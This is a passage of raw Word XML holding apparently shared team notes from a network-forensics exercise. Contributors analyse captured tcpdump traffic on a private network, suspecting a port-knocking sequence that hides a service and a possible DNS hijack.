          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00795A36">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0C4C5BD4">
        <w:t>Uses port knocking to hide service.</w:t>
      </w:r>
      <w:r w:rsidR="1328EB40">
        <w:t xml:space="preserve"> Increments port </w:t>
      </w:r>
      <w:r w:rsidR="139EE448">
        <w:t xml:space="preserve">and knocks on IP 10.39.26.9 with 0 length packages, until finally </w:t>
      </w:r>
      <w:r w:rsidR="45FACED3">
        <w:t>sending</w:t>
      </w:r>
      <w:r w:rsidR="139EE448">
        <w:t xml:space="preserve"> non-0 length packages </w:t>
      </w:r>
      <w:r w:rsidR="6A249D4F">
        <w:t xml:space="preserve">with payload </w:t>
      </w:r>
      <w:r w:rsidR="139EE448">
        <w:t>to 10.39.26.9:35572</w:t>
      </w:r>
      <w:r w:rsidR="383560E7">
        <w:t>. Makes sense or am I just making stuff up?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="551EA35B" w:rsidP="75FE2C14" w:rsidRDefault="551EA35B" w14:paraId="1F0BD6E3" w14:textId="43D48B8E">
      <w:r w:rsidRPr="482F188F">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Idea3/</w:t>
      </w:r>
      <w:r w:rsidRPr="482F188F" w:rsidR="3FF773FD">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="3FF773FD">
        <w:t xml:space="preserve"> 10.39.26.132, because it seems to be serving brexit.gov.uk from a local webserver</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="3FF773FD">
        <w:t>(DNS Hijacking?)</w:t>
      </w:r>
      <w:r w:rsidR="2E3AA354">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="78A19590" w:rsidP="5A935770" w:rsidRDefault="5A8F7104" w14:paraId="6057FF05" w14:textId="6E516C08">
      <w:r w:rsidRPr="5FC95357">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Idea</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="5FC95357" w:rsidR="608AB5AB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidRPr="5FC95357">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="5FC95357">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>/:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  Agree with idea 2 about port knocking but I think the port knocking is happening with a different source/destination pair: 10.39.26.13</w:t>
      </w:r>
      <w:r w:rsidR="594D695E">
        <w:t xml:space="preserve"> and 10.39.26.150. Log snippets:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="226BEEF9" w:rsidP="5A935770" w:rsidRDefault="40991FBE" w14:paraId="5EED7695" w14:textId="590FC686">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>2020-04-29 17:59:25.408706 IP 10.39.26.13:33694 &gt; 10.39.26.150:80: Flags [S], seq 719317062, win 29200, options [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>mss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>1460,sackOK</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">,TS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>val</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> 755869 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ecr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0,nop,wscale 7], length 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="226BEEF9" w:rsidP="5A935770" w:rsidRDefault="40991FBE" w14:paraId="716B2437" w14:textId="2F0FC519">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">2020-04-29 17:59:25.408789 IP 10.39.26.150:80 &gt; 10.39.26.13:33694: Flags [R.], seq 0, ack 719317063, win 0, length </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="226BEEF9" w:rsidP="5A935770" w:rsidRDefault="40991FBE" w14:paraId="2A2BBDF2" w14:textId="0988EBFE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>2020-04-29 17:59:30.361099 IP 10.39.26.13:47725 &gt; 10.39.26.150:1352: Flags [S], seq 3213090065, win 29200, options [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>mss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1460,sackOK,TS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>val</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> 756735 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ecr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0,nop,wscale 7], length 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="226BEEF9" w:rsidP="5A935770" w:rsidRDefault="40991FBE" w14:paraId="3BF9FAB9" w14:textId="3B69CC52">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>2020-04-29 17:59:30.361100 IP 10.39.26.150:1352 &gt; 10.39.26.13:47725: Flags [R.], seq 0, ack 3213090066, win 0, length 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="226BEEF9" w:rsidP="5A935770" w:rsidRDefault="40991FBE" w14:paraId="766F7CE2" w14:textId="22D15867">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>2020-04-29 17:59:32.329186 IP 10.39.26.13:47728 &gt; 10.39.26.150:1352: Flags [S], seq 2510248038, win 29200, options [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>mss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1460,sackOK,TS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>val</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> 757599 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ecr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0,nop,wscale 7], length 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="226BEEF9" w:rsidP="5A935770" w:rsidRDefault="40991FBE" w14:paraId="66C685C7" w14:textId="35652C4C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>2020-04-29 17:59:32.329368 IP 10.39.26.150:1352 &gt; 10.39.26.13:47728: Flags [R.], seq 0, ack 2510248039, win 0, length 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="226BEEF9" w:rsidP="5A935770" w:rsidRDefault="40991FBE" w14:paraId="34AF1B6A" w14:textId="3EFACA54">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>2020-04-29 17:59:35.781547 IP 10.39.26.13:33699 &gt; 10.39.26.150:80: Flags [S], seq 547804056, win 29200, options [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>mss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>1460,sackOK</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">,TS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>val</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> 758462 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ecr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0,nop,wscale 7], length 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="226BEEF9" w:rsidP="5A935770" w:rsidRDefault="40991FBE" w14:paraId="1F74D402" w14:textId="10705389">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">2020-04-29 17:59:35.781635 IP 10.39.26.150:80 &gt; 10.39.26.13:33699: Flags [R.], seq 0, ack 547804057, win 0, length </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="226BEEF9" w:rsidP="5A935770" w:rsidRDefault="40991FBE" w14:paraId="6559238F" w14:textId="118E2934">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>2020-04-29 17:59:39.289298 IP 10.39.26.13:43387 &gt; 10.39.26.150:80: Flags [S], seq 1380792358, win 29200, options [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>mss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>1460,sackOK</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">,TS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>val</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> 759339 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ecr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0,nop,wscale 7], length 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="226BEEF9" w:rsidP="5A935770" w:rsidRDefault="40991FBE" w14:paraId="52AD4485" w14:textId="00585529">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>2020-04-29 17:59:39.289548 IP 10.39.26.150:80 &gt; 10.39.26.13:43387: Flags [S.], seq 1557038902, ack 1380792359, win 28960, options [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>mss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>1460,sackOK</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">,TS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>val</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> 773955 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ecr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="133B6B4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> 759339,nop,wscale 7], length 0</w:t>
      </w:r>
      <w:r w:rsidRPr="133B6B4D" w:rsidR="5A8F7104">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7E9232EC" w:rsidP="5A935770" w:rsidRDefault="7E9232EC" w14:paraId="0C2C4DA9" w14:textId="346833EE">
      <w:r>
        <w:t xml:space="preserve">The connection knocks on </w:t>
      </w:r>
      <w:r w:rsidR="6CE3D5C8">
        <w:t xml:space="preserve">80, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1352, </w:t>
      </w:r>
      <w:r w:rsidR="06015352">
        <w:t>1352, 80</w:t>
      </w:r>
      <w:r w:rsidR="2A26F784">
        <w:t xml:space="preserve"> and gets all Resets. After this it connects on 80</w:t>
      </w:r>
      <w:r w:rsidR="06015352">
        <w:t xml:space="preserve"> and then finally gets a SYN-ACK</w:t>
      </w:r>
      <w:r w:rsidR="718F2413">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F3678D3" w:rsidP="5A935770" w:rsidRDefault="5E9C2453" w14:paraId="2CCD6CE5" w14:textId="759D4CFE">
      <w:r>
        <w:t>Agree with Idea 4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5A935770" w:rsidP="5A935770" w:rsidRDefault="5A935770" w14:paraId="147D32AD" w14:textId="35C4A338"/>
    <w:p w:rsidR="5A935770" w:rsidP="5A935770" w:rsidRDefault="5A935770" w14:paraId="0599D603" w14:textId="55CDC29A"/>
    <w:p w:rsidR="28AD3D80" w:rsidP="499DF1D5" w:rsidRDefault="28AD3D80" w14:paraId="45B8272F" w14:textId="29A5F2BD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
